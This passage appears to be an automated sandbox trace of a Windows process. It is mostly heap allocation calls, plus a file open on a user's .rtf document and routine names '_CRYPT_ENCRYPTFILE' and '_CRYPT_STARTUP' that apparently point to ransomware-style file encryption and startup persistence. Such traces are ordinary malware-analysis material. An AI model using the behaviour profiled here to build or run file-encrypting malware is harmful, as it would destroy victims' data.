hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0080.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0080.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0080.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0080.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0080.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.467] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0080.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0080.467] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb348 [0080.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb348, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0080.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.468] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0080.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0080.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0080.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0080.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0080.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0080.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0080.469] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\5r 2.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0080.485] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0080.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a48c0 [0080.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0080.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0080.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0080.486] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0080.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0080.487] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0080.487] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0a8 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a50b8 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.489] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.489] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.489] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.489] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a48c0 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0080.490] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43caf58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0080.491] CloseHandle (hObject=0x298) returned 1 [0080.491] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.492] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0080.492] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff39c120, ftCreationTime.dwHighDateTime=0x1d5e8d9, ftLastAccessTime.dwLowDateTime=0x8d8523a0, ftLastAccessTime.dwHighDateTime=0x1d5ebf7, ftLastWriteTime.dwLowDateTime=0x8d8523a0, ftLastWriteTime.dwHighDateTime=0x1d5ebf7, nFileSizeHigh=0x0, nFileSizeLow=0x276a, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="5R 2.rtf", cAlternateFileName="5R2~1.RTF")) returned 0x41ac440 [0080.492] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0080.492] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | 